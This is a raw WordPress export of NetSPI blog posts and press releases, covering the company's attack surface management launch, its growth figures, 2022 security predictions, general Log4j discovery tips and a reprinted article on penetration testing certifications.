  • Advanced Solutions
  • Code Analysis
  • Perimeter Protection
  • Proactive Solutions 

Awareness, education, and code analysis will continue to evolve. Adversaries are always changing the game when it comes to finding vulnerabilities given the popularity of third-party and open-source components. There is always a new need to look at different capabilities based on this risk context. Solutions that are not only advanced but practical will be increasingly important.  

Samir continued, “Shift left-to-right is critical.” To measure the application security program, organizations need to look at the SDLC from one end to the other. From different contexts – how they develop and train their engineers to what they’re seeing on the infrastructure side with solutions that provide visibility into how they’re deploying and the types of attack patterns that target their applications.  

Understanding the interplay between these capabilities will help organizations understand what to address and prioritize to drive the effectiveness of their application security program

A Layered Approach to Application Security Testing  

Using the strategies discussed in this blog post and in the webinar, you’ll be able to implement a layered approach to AppSec that will help you build a world-class AppSec program. It starts with learning how to incorporate a risk context across the SDLC, then determining the key timeframes to implement application security testing and understanding how your solution capabilities interplay with one another.

Listen to the full conversation on building a world-class, layered application security program.
[post_title] => How to Build a Layered Approach to Application Security Testing [post_excerpt] => Learn best practices from top AppSec experts to help you build a world-class application security testing program. [post_status] => publish [comment_status] => closed [ping_status] => open [post_password] => [post_name] => how-to-build-a-layered-approach-to-application-security-testing [to_ping] => [pinged] => [post_modified] => 2022-03-25 15:24:13 [post_modified_gmt] => 2022-03-25 20:24:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27549 [menu_order] => 65 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 27377 [post_author] => 91 [post_date] => 2022-02-22 08:05:00 [post_date_gmt] => 2022-02-22 14:05:00 [post_content] =>
The offering leverages innovative technology and expert pentesters to help organizations discover and secure all assets on the external attack surface.

Minneapolis, MNNetSPI, the leader in enterprise penetration testing, today introduced Attack Surface Management to help secure the expanding, global attack surface. The platform delivers continuous pentesting backed by NetSPI’s global security testing team to help organizations inventory known and unknown internet-facing assets, identify exposures, and prioritize critical risks to their business. 

According to Gartner’s Emerging Technologies: Critical Insights for External Attack Surface Management report, analysts recommend attack surface management implementation “as part of a broader, enterprise-wide vulnerability and threat management effort, where known and unknown risks, vulnerabilities and assets are handled as part of a concerted and integrated strategy.” 

Attack Surface Management is a core component of NetSPI’s Penetration Testing as a Service (PTaaS) delivery model. It complements the company’s established Penetration Testing and Adversary Simulation technology-powered services to provide an integrated, full suite of offensive security solutions for its customers.

“You don’t know what you don’t know, and what you don’t know can hurt you,” said Travis Hoyt, Chief Technology Officer at NetSPI. “What we have built here is a comprehensive solution to shadow IT and asset management challenges. Attack Surface Management provides an opportunity for organizations to continuously enhance their security posture, improve their penetration testing strategies, and ultimately reduce the probability and impact of a costly cyberattack.”

https://youtu.be/ElP3hKWc55E

Key capabilities of NetSPI’s Attack Surface Management include: 

  • Comprehensive Asset Discovery: NetSPI’s Attack Surface Management technology platform leverages automated scanning and orchestration technology to map, identify, and inventory all assets and improve attack surface visibility.  
  • 24/7/365 Continuous Testing: The cloud-native, dynamic application monitors the attack surface continuously and alerts when a high-risk exposure is detected. It provides simplified and always-on attack surface visualization to view your entire external attack surface in a single platform. 
  • Manual Exposure Triaging: The NetSPI Attack Surface Management (ASM) Operations Team triages high-risk exposures to validate the exposure, evaluate the risk it poses to your business, support your team with remediation advisory, and escalate worrisome exposures to our penetration testing team to investigate further. 

“The current attack surface management market is reliant on technology. But to find critical exposures that put your organization at risk, human intuition is required,” said Aaron Shilts, CEO at NetSPI. “Our ASM Operations Team is rooted in 20 years of manual penetration testing expertise. We bring a human-centric, strategic approach to the market that will help security leaders get a better handle on their evolving attack surface.” 

The Attack Surface Management (ASM) platform also features simple set-up, tracking and trending data over time, asset intelligence, Slack and email integrations, open source intelligence gathering, asset and exposure prioritization, port discovery, and more. For additional details on its capabilities and features, download the attack surface management data sheet.

To learn more or get started with Attack Surface Management, email sales@netspi.com or visit our website.

About NetSPI 

NetSPI is the leader in enterprise penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three out of the five FAANG companies, the world’s largest healthcare organizations, the largest global cloud providers, and many of the Fortune® 500. Its platform driven, human delivered Penetration Testing, Adversary Simulation, and Attack Surface Management services are supported by dynamic technology platforms and a dedicated team of global penetration testing experts. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com 
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com 
(978) 201-2510 

[post_title] => NetSPI Launches New Attack Surface Management Platform [post_excerpt] => Learn more about NetSPI's Attack Surface Management solution which leverages innovative technology, continuous penetration testing, and expert pentesters to help organizations discover and secure all assets on the external attack surface and increase attack surface visibility. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attack-surface-management [to_ping] => [pinged] => [post_modified] => 2022-02-22 07:24:41 [post_modified_gmt] => 2022-02-22 13:24:41 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27377 [menu_order] => 77 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 27266 [post_author] => 91 [post_date] => 2022-02-01 11:15:00 [post_date_gmt] => 2022-02-01 17:15:00 [post_content] =>
Amidst a year of rapid growth, NetSPI is recognized for its strong corporate culture.

Minneapolis, MNNetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the top workplaces in the U.S. by Energage – a leading provider of technology-based employee engagement tools. Winners are chosen based on an anonymous third-party employee survey that measures several aspects of workplace culture, including alignment, execution, and connection. 

"This recognition by Energage is a true testament to what makes NetSPI a leading, innovative company," said Aaron Shilts, CEO of NetSPI. "Our employees are the heart of our business, working to drive results for our clients, while celebrating our wins together as a team. I’m proud to see NetSPI recognized for our strong culture, as it is the key to what makes our company special."

This Top Workplace recognition follows a year of success and growth for the company. The team brought on more than 100 new employees in 2021, all of who played a part in achieving 51% organic revenue growth and 100% bookings growth throughout the fiscal year.

"While we’ve grown rapidly over the past year, increasing the size of our team by 50%, we have not lost sight of the elements that make NetSPI a great place to work," said Heather Neumeister, Director of People Operations at NetSPI. "Our employees prioritize collaboration and foster both individual and team growth, creating a culture where everyone is excited to come to work each day."

Top Workplaces USA celebrates organizations with 150 or more employees that have built great cultures. While more than 42,000 organizations were invited to participate, just over 1,100 organizations have been honored with the Top Workplaces USA award this year. 

NetSPI is hiring. Visit www.netspi.com/careers to view open roles and apply.

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

About Energage 

Making the world a better place to work together.™
Energage is a purpose-driven company that helps organizations turn employee feedback into useful business intelligence and credible employer recognition through Top Workplaces. Built on 14 years of culture research and the results from 23 million employees surveyed across more than 70, 000 organizations, Energage delivers the most accurate competitive benchmark available. With access to a unique combination of patented analytic tools and expert guidance, Energage customers lead the competition with an engaged workforce and an opportunity to gain recognition for their people-first approach to culture. For more information or to nominate your organization, visit Energage or Workplaces.

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 

[post_title] => Energage Names NetSPI a 2022 Top Workplaces USA Winner [post_excerpt] => Read how NetSPI won the 2022 Top Workplaces USA with its strong corporate culture and significant growth. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 2022-top-workplaces-usa [to_ping] => [pinged] => [post_modified] => 2022-01-28 15:56:01 [post_modified_gmt] => 2022-01-28 21:56:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27266 [menu_order] => 85 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 27234 [post_author] => 91 [post_date] => 2022-01-25 08:05:00 [post_date_gmt] => 2022-01-25 14:05:00 [post_content] =>
NetSPI reports a record-high year for growth and momentum, solidifying its role in the evolving security industry.

Minneapolis, MNNetSPI, the leader in enterprise penetration testing and attack surface management, today announced the achievement of 51% organic revenue growth in fiscal year 2021. This positions NetSPI as a competitive solution in the Penetration Testing as a Service (PTaaS) industry. Additionally, the company partnered with more than 319 new clients and welcomed 119 new employees. 

To achieve continued success in 2022, NetSPI appointed financial services industry veteran, Travis Hoyt, as Chief Technology Officer to help drive penetration testing, adversary simulation, and attack surface management product strategy. NetSPI also promoted Alex Jones to the company’s first Chief Revenue Officer, where he will continue driving strategic growth.  

“NetSPI’s 100% bookings growth in 2021 was driven by our customer-first approach to implementing meaningful security posture improvements across our client base,” said Aaron Shilts, CEO of NetSPI. “Our talented team of employees has continued to innovate by offering the highest fidelity testing results so clients can easily consume results in real-time and remediate potential threats. As we look to the new year, our team will continue to redefine penetration testing through our platform-driven, human-delivered approach and power clients with services that enable them to be prepared for any vulnerability.” 

 
Achievements that contributed to NetSPI’s success in 2021 include: 

  • $90 Million in Growth Funding: Led by KKR, with participation from Ten Eleven Ventures, the investment will be used to further accelerate NetSPI’s rapid growth. The team will prioritize expanding and investing in product innovation and deepening operations across all markets. 
  • Introduction of Risk Scoring: NetSPI added risk scoring intelligence to its Penetration Testing as a Service (PTaaS) platform to help its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business. 
  • New Ransomware Attack Simulation Service: The new technology-powered service enables organizations to emulate real world ransomware to help continuously improve their ability to detect ransomware attacks. 
  • Discovery of Critical Azure Vulnerability: Practice director Karl Fosaaen discovered a critical misconfiguration in Microsoft Azure which if exploited, would allow malicious actors to escalate up to a Contributor role in the Azure Active Directory subscription. Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue.
  • Apache Log4j Assessment: NetSPI leveraged its PTaaS platform to create a robust, targeted assessment that tests client environments for vulnerable Log4j instances. This service uses the power of NetSPI’s technology and penetration testers to find and help remediate the ubiquitous vulnerability across an organization’s attack surface.
  • IoT Penetration Testing: NetSPI added IoT penetration testing services to its existing suite of capabilities. NetSPI’s new IoT testing services focuses on identifying security flaws in ATM, automotive, operational technology, embedded, and medical devices and systems.

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 

[post_title] => NetSPI Exceeds 50% Organic Revenue Growth in 2021 [post_excerpt] => KKR growth funding, advancements in penetration testing services, strategic partnerships, and more contributed to NetSPI’s record revenue growth. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-50-percent-organic-revenue-growth-2021 [to_ping] => [pinged] => [post_modified] => 2022-01-25 09:19:53 [post_modified_gmt] => 2022-01-25 15:19:53 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27234 [menu_order] => 89 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 27184 [post_author] => 91 [post_date] => 2022-01-19 08:00:00 [post_date_gmt] => 2022-01-19 14:00:00 [post_content] =>
Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs, and technology executives. 

Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Chief Technology Officer Travis Hoyt was accepted into Forbes Technology Council, an invitation-only community for world-class CIOs, CTOs, and technology executives. 

Travis was vetted and selected by a review committee based on the depth and diversity of his experience. Criteria for acceptance include a track record of successfully impacting business growth metrics, as well as personal and professional achievements and honors.  

“We are honored to welcome Travis into the community,” said Scott Gerber, founder of Forbes Councils, the collective that includes Forbes Technology Council. “Our mission with Forbes Councils is to bring together proven leaders from every industry, creating a curated, social capital-driven network that helps every member grow professionally and make an even greater impact on the business world.” 

“It’s exciting to be considered an expert among the impressive group of security and technology leaders on the Forbes Technology Council,” said Travis. “There is a lot we can learn from one another. I’m honored to share insights from my 20+ years in the infosec industry to help others better understand how to leverage offensive security activities and ultimately reduce organizational risk.”

Visit Travis’ profile and read his first published article, Three Reasons To Include Finance And Risk Leadership In Security Testing Discussions

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

About Forbes Councils 

Forbes Councils is a collective of invitation-only communities created in partnership with Forbes and the expert community builders who founded Young Entrepreneur Council (YEC). In Forbes Councils, exceptional business owners and leaders come together with the people and resources that can help them thrive. 

For more information about Forbes Technology Council, visit forbestechcouncil.com. To learn more about Forbes Councils, visit forbescouncils.com

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 

[post_title] => NetSPI CTO Travis Hoyt Accepted into Forbes Technology Council [post_excerpt] => Follow Travis on the Forbes Technology Council for insights on cybersecurity leadership and strategy, penetration testing, blockchain security, and more. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-cto-travis-hoyt-forbes-technology-council [to_ping] => [pinged] => [post_modified] => 2022-01-19 09:39:03 [post_modified_gmt] => 2022-01-19 15:39:03 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27184 [menu_order] => 90 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 27044 [post_author] => 91 [post_date] => 2022-01-04 07:00:00 [post_date_gmt] => 2022-01-04 13:00:00 [post_content] =>

And just like that, 2021 has come to a close. We started with SolarWinds and ended with Log4j… cyber adversaries certainly know how to keep us on our toes. In between, Microsoft Exchange, the Florida water plant, JBS, CNA Financial, Kaseya, EA, Colonial Pipeline, among other breach targets made headlines and shook up the security industry. 

Each of these pivotal moments may have brought fear, uncertainty, and doubt, but with that also came innovation, a sense of community, and lessons learned. If there’s one thing to take away from the past year, it’s to always reflect on and learn from your experiences – good or bad. 

In the name of reflection and moving forward, three NetSPI thought leaders, Travis Hoyt (CTO), Nabil Hannan (Managing Director), and Florindo Gallicchio (Head of Strategic Solutions) came together on a live panel to discuss their cybersecurity predictions for 2022

Pulling from their decades of experience and daily conversations with some of the most prominent organizations across the globe. They tackled highly debated topics of 2021, from budgets to application security to ransomware. Continue reading to find out what they’re anticipating in the new year. 

2022 cybersecurity budgets are going to rebound significantly 

“Throughout my career, budgeting has always been a challenge. In 2020 and 2021, security budgets had suffered a pretty big hit primarily due to companies allocating that money to work from home technologies, digital transformation, and business continuity amid the pandemic. And we’re beginning to see those budgets rebound.  

While we were cooped up in our houses and locked down at the beginning of the pandemic, the bad guys were not, and they kept busy uncovering egregious vulnerabilities to exploit. We noticed now that there's a game of catch up is being played and budgets are being allocated, or re-allocated, back to cybersecurity, penetration testing in particular.” – Florindo Gallicchio, Head of Strategic Solutions, NetSPI 

CFOs will have more skin in the security game 

“For too long, companies have taken a reactionary approach to ransomware attacks – opting to pay, or not pay, after the damage has already been caused. I expect to see CFOs prioritizing conversations surrounding ransomware and cyber insurance within 2022 planning and budgetary meetings to develop a playbook that overalls all potential ransomware situations and a corresponding strategy to mitigate both damage and corporate spend. If they don’t lead with proactivity and continue to take a laggard approach to ransomware and cyber insurance, they are leaving their companies at risk for both a serious attack and lost corporate funds. At mature organizations, CFOs are starting to understand that they've got a lot more skin in the game.” – Travis Hoyt, Chief Technology Officer, NetSPI 

Cybersecurity insurers will ask deeper, more technical questions 

“There’s currently a lack of willingness to underwrite cybersecurity policies. The market is cracking down and underwriters are asking tougher questions. Cybersecurity is not just a line item in a budget, it's not just a percentage of spend against it, it has much more material impact to the business. As you look at the mitigations and activities that you'll need to do with respect to understanding what you have in your environment, your exposures, your vulnerabilities – attack surface management, penetration testing – you’ll also need to look at your control posture. How are your teams responding to incursions? What kind of breach and attack simulation activities are you pursuing? These are the items that underwriters are going to curious about. It's a much deeper, much more technical set of questions than I have seen them ask historically, and I think it represents the evolution of the market.” – Travis Hoyt, Chief Technology Officer, NetSPI 

More organizations will focus on risk in cybersecurity budgeting discussions 

“We’ve noticed a heightened focus on a risk approach or risk justification for budgets, over compliance, check-the-box approaches we've seen in the past. Companies are starting to build budget justifications based on risk to the business. In fact, we are seeing more clients take a risk-based approach to cybersecurity spend than before.” – Florindo Gallicchio, Head of Strategic Solutions, NetSPI 

2022 is the year of API security 

“Watching application security, in conjunction with software development, evolve over the last 15 years, we've seen a significantly large uptick in API based architectures. I'm predicting 2022 is going to be the year of the API, where organizations will become serious about securing their APIs.  

The Log4j issue arises from a bad habit that software development has fallen into: reusing components without fully understanding the implications. We're also building software with very small bite-sized components that interact with your web applications, your mobile applications, your thermostat at home, your smart car, and other things we rely heavily on. API security is going to get a lot more attention now because organizations are starting to realize how heavily dependent they are on this type of architecture. And you have to be dependent on this type of architecture if you truly want to build systems that are robust and scalable. I expect that API security will become one of the top priorities in the application security space this year.” – Nabil Hannan, Managing Director, NetSPI 

The concept of ‘shift left’ will transform into ‘shift everywhere’ 

“Shift left is a great thought process, and we need to continue doing that. But we also have to start focusing on shifting right. We need to shift everywhere. Thinking of application security holistically will enable you to protect your organization and protect your systems.  

Look at technologies beyond web firewalls. Start looking at the viability of RASP solutions. In certain scenarios, start thinking of how to integrate IAST into the QA testing process. All of these activities need to work together. The Log4j issue has highlighted the need to shift right. We need to learn from it and determine the right approach to protect our organizations for the next big vulnerability that comes up.” – Nabil Hannan, Managing Director, NetSPI 

SaaS security posture management (SSPM) will be prioritized in 2022 

“As organizations continue to become more reliant on SaaS technologies to enable digital transformation efforts, the security perimeter has expanded. Organizations now face a new source of cybersecurity risk as cybercriminals look to exploit misconfigurations or vulnerabilities in these SaaS technologies to wage costly attacks. In 2022, we can expect that organizations will become more focused on SaaS posture management and ensuring that their SaaS footprint is not left open as a vector for cyberattacks. This trend will be further accelerated by the insistence of insurance providers that organizations have a detailed understanding of their SaaS deployments and configurations or face higher premiums or even a refusal of insurance altogether.” - Travis Hoyt, Chief Technology Officer, NetSPI 

The blockchain security space will grow in awareness and acumen 

Blockchain is an interesting space on the currency and finance side. But what we're actually seeing is that there are a lot of people that are interested in the underlying technology, the distributed ledger technology. There are a lot of organizations, or consortiums, that are starting to leverage this technology to solve a variety of problems that allow them to interact in ways that perhaps they would not have been able to do - or do efficiently - in the past. 

It's one of those things that security teams are going to have to start paying attention to. While there are overlaps with respect to the security testing methodologies, there are some unique differences that will change your operating and security processes, especially when you're deploying them in a distributed fashion. My prediction is that we will see the blockchain security space start to grow in 2022.  

It's going to be a very compelling and interesting story. The acumen for attacking this technology by threat actors is already well cultivated. What we don't have is the same measure of acumen cultivation by the defenders. My call to action is, if this technology is going to be in play in your space, then you need to make sure that your teams understand how it operates, where it's unique, how it's unique, and what you need to defend it effectively and get that acumen development in place.” – Travis Hoyt, Chief Technology Officer, NetSPI 

Company culture could solve the cybersecurity hiring crisis  

“It’s no secret that cybersecurity, like many industries, is facing a hiring crisis. The Great Resignation we’re seeing across the country has underscored a growing trend spurred by the COVID-19 pandemic: employees will leave their company if it cannot effectively meet their needs or fit into their lifestyle. From a retention perspective, I expect to see department heads fostering a culture that’s built on principles like performance, accountability, caring, communication, and collaboration. Once this team-based viewpoint is established, employees will take greater pride in their work, producing positive results for their teams, the company and themselves – ultimately driving positive retention rates across the organization.” Charles Horton, Chief Operations Officer, NetSPI [note: Charles was unable to attend the webinar, Nabil shared this prediction on his behalf] 

The Skills Shortage Will Continue Until Hiring Practices Change  

“In 2022 the cybersecurity skills gap will persist, but organizations that take a realistic approach to cybersecurity hiring and make a commitment to building cybersecurity talent from the ground up will find the most success in addressing it. The focus in closing the skills gap often relies on educating a new generation of cybersecurity professionals through universities and trade programs, and generally encouraging more interest in young professionals joining the field. In reality, these programs will only have limited success. The real culprit behind the skills gap is that organizations often maintain unrealistic hiring practices, with cybersecurity degrees and certification holders often finding untenable job requirements such as 3+ years of experience for an entry level job.” – Nabil Hannan, Managing Director, NetSPI 

Want more? Watch our panel:  2022 Cybersecurity Predictions: What to Expect in the New Year
[post_title] => New Year, New Trends: 2022 Cybersecurity Predictions [post_excerpt] => Our experts reveal their security industry predictions for 2022, from cybersecurity budgets to application security to ransomware. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 2022-cybersecurity-trends-predictions [to_ping] => [pinged] => [post_modified] => 2022-02-16 10:48:12 [post_modified_gmt] => 2022-02-16 16:48:12 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27044 [menu_order] => 96 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 26983 [post_author] => 91 [post_date] => 2021-12-21 07:00:00 [post_date_gmt] => 2021-12-21 13:00:00 [post_content] =>

The first step to remediating Log4j vulnerabilities? Discovery.

Identifying Apache Log4j usage at scale in any environment can be a challenge. Generally, we're seeing companies struggle to develop comprehensive strategies to identify the vulnerability accurately across their entire environment. Getting real coverage involves reviewing all assets from both an authenticated and unauthenticated perspective, and often requires additional collaboration with business units and development teams. In some cases, this can be a challenge when there are "black boxes" on their networks that have no clear owner.

To help you get started, we’ve pulled together five discovery tips to identify vulnerable instances of Log4j. For additional detail and best practices for discovery, download our tip sheet: 5 Strategies for Log4j Vulnerability Identification.

  1. Perform both internal and external network scanning using common vulnerabilities scanners, such as Nmap or Nessus. Most of the Apache Log4j plugins used by vulnerability scanners only test a small subset of common HTTP headers, but they still provide basic coverage. To provide more comprehensive coverage, also perform focused web application testing. Create an inventory of externally and internally available web applications.
  2. Leverage existing security or configuration management tooling to search systems for files that are unique to Log4j. Then, follow up on positive matches to determine if they are running a vulnerable version of Apache Log4j. The files can be downloaded online: https://logging.apache.org/log4j/2.x/index.html.
  3. Reach out to vendors to determine if vulnerable Apache Log4j versions are being used for applications that were not developed by your company that have already been deployed to the environment.
  4. Collaborate with internal business units and development groups to determine if vulnerable Apache Log4j versions are being used by internally developed applications.
  5. Prioritize additional testing based on company defined risk. Testing should focus on mapping the web applications attack surface and testing all identifiable dynamic elements such common HTTP headers, parameters (GET, POST, JSON), and cookies.

Log4j is another example of attackers targeting software that's integrated into core IT supply chains. However, Log4j represents a much greater risk than some of its predecessors, because it’s widely associated with multiple operating systems and websites exposed to the internet. As a result, attackers are scrambling to use it as quickly as possible to gain a foothold in environments and leverage it to deploy sophisticated attacks, such as ransomware. I think this will be the first of many breakouts that target, not common software packages, but their dependencies/third party components.

Time is critical in this situation, and vulnerability discovery is the first step to protecting your organization from exploitation. Connect with NetSPI to learn how we can help you with our Log4j Vulnerability Assessment: https://www.netspi.com/contact-us/.

Download NetSPI's Resource, "5 Strategies for Log4j Vulnerability Identification" Now!

[post_title] => 5 Apache Log4j Discovery Tips [post_excerpt] => Need help identifying vulnerable instances of Apache Log4j? Read this blog for 5 discovery tips. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 5-apache-log4j-discovery-tips [to_ping] => [pinged] => [post_modified] => 2021-12-21 09:08:10 [post_modified_gmt] => 2021-12-21 15:08:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26983 [menu_order] => 99 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [19] => WP_Post Object ( [ID] => 26981 [post_author] => 91 [post_date] => 2021-12-20 02:00:00 [post_date_gmt] => 2021-12-20 08:00:00 [post_content] =>

On December 20, 2021, NetSPI Managing Security Consultant Melissa Miller was featured in an article written by Josh Fruhlinger for CSO. Read the full article below or online here.

+++

Penetration testing, sometimes called ethical hacking or red team hacking, is an exciting career path in which you simulate cyberattacks on target systems in order to test (and, ultimately, improve) their security. It's a job that lots of people currently working in infosec would like to have, and one that can be tricky to get as competition heats up.

"It used to be the best way to grow a career in attack and penetration was through hands-on experience," says Matthew Eidelberg, technical manager for threat management at Optiv. "It’s becoming harder and harder to break into pen testing as a beginner, because these roles are no longer considered niche. They are in high demand. As a result, a lot of effort has gone into certifications based on training and real-world lab simulations for both students and professionals."

In fact, a range of penetration testing certifications are now available from various companies and industry organizations—and earning these certs can boost your career prospects, says Ron Delfine, director of career services at Carnegie Mellon University's Heinz College. "Depending on what skills an organization is seeking," he says, "certification holders may have a competitive advantage related to career advancement, as they have already been through a proven process requiring them to display evidence of strong penetration testing skills through the certification and recertification process."

Top penetration testing certifications

How can you pick the best penetration testing certification for you? We spoke to a number of pen testing pros to see how different certifications have helped their careers or helped them find good candidates when they were hiring. In general, most of the people we spoke to grouped certs offered by the same orgs together, so that's how we'll treat them here too.

  • Offensive Security Certified Professional (OSCP)
  • Offensive Security Wireless Professional (OSWP)
  • Offensive Security Experienced Penetration Tester (OSEP)
  • GIAC Penetration Tester (GPEN)
  • GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)
  • EC-Council Certified Ethical Hacker (CEH)
  • EC-Council Certified Penetration Testing Professional (CPENT)/Licensed Penetration Tester (LPT Master)
  • CompTIA PenTest+

. . .

EC-Council

The EC-Council is a cybersecurity education and training nonprofit founded in the wake of the 9/11 attacks, and Certified Ethical Hacker (CEH) is perhaps their highest-profile cert—in fact, it's one of the best-known certifications in the field. The EC-Council recently launched a twinned pair of certs, Certified Penetration Testing Professional (CPENT) and Licensed Penetration Tester (LPT Master), that are based on the same training material and exam, with the LPT Master going to those who score best on the test.

CEH is relatively well known, and the security pros we spoke to note that it has its place in the field, but they were less enthusiastic about it than they were about certs from GIAC or Offensive Security. "I would note CEH as a ‘foot-in-the-door’ certification for a pen testing internship or in preparation for additional study," says Melissa Miller, managing security consultant at NetSPI. Critical Start's Rhoads-Herrera calls it "valuable as a good way to get past HR screeners" but adds that "the course work is not up to par with other certifications."

"CEH does qualify you for a number of contracts by virtue of being one of the oldest in the game," says Pluralsight's Rosenmund, "but doesn’t necessarily ensure from an employer perspective that you are ready to do the job." Counter Hack Challenges' Elgee gives a specific example: "CEH is most valuable for checking specific certification boxes, especially in US government," but says it "otherwise has a low value to price ratio."

Certified Ethical Hacker (CEH):

Prerequisites: You must either take an EC-Council-approved CEH training course or establish that you have at least two years of professional infosec experience before you can take the exam.

Test format: Four hours, 125 multiple choice questions. If you pass this exam, you can also take the Certified Ethical Hacker Practical exam—six hours, 20 practical challenges—in order to earn CEH Master certification.

Cost: The exam costs $1,199 plus $100 for remote proctoring; there is a $100 nonrefundable application fee, and official training courses can cost anywhere from $850 to $2,999.

Official website: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/

Certified Penetration Testing Professional (CPENT)/Licensed Penetration Tester (LPT Master):

Prerequisites: Candidates must have already received CEH and Certified Security Analyst certs from the EC-Council, and submit an application that includes a criminal background check. The exam is meant to follow on from the EC-Council's CPENT training course, although experienced pen testers can request to "challenge" the exam based on their existing skills. 

Test format: A 24-hour online practical exam in which you deploy advanced pen-testing techniques. A 90% score or above earns you the LPT certification, while 70-90% scores you a CPENT.

Cost: The CPENT course is $2,199, which includes the exam and access to the EC-Council's practice range and other content. There is also a $500 application fee (which covers the background check.)

Official website: https://www.eccouncil.org/programs/licensed-penetration-tester-lpt-master/

[post_title] => CSO: 8 top penetration testing certifications employers value [post_excerpt] => On December 20, 2021, NetSPI Managing Security Consultant Melissa Miller was featured in an article written by Josh Fruhlinger for CSO. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cso-8-top-penetration-testing-certifications-employers-value [to_ping] => [pinged] => [post_modified] => 2021-12-20 18:13:36 [post_modified_gmt] => 2021-12-21 00:13:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26981 [menu_order] => 100 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 26964 [post_author] => 91 [post_date] => 2021-12-13 13:14:00 [post_date_gmt] => 2021-12-13 19:14:00 [post_content] =>

On December 13, 2021, NetSPI was featured in an article written by Lisa Vaas for Threatpost. Read the full article below or online here.

+++

What some call the worst cybersecurity catastrophe of the year – the Apache Log4j logging library exploit – has spun off 60 bigger mutations in less than a day, researchers said.

The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.

Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by SophosMicrosoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.

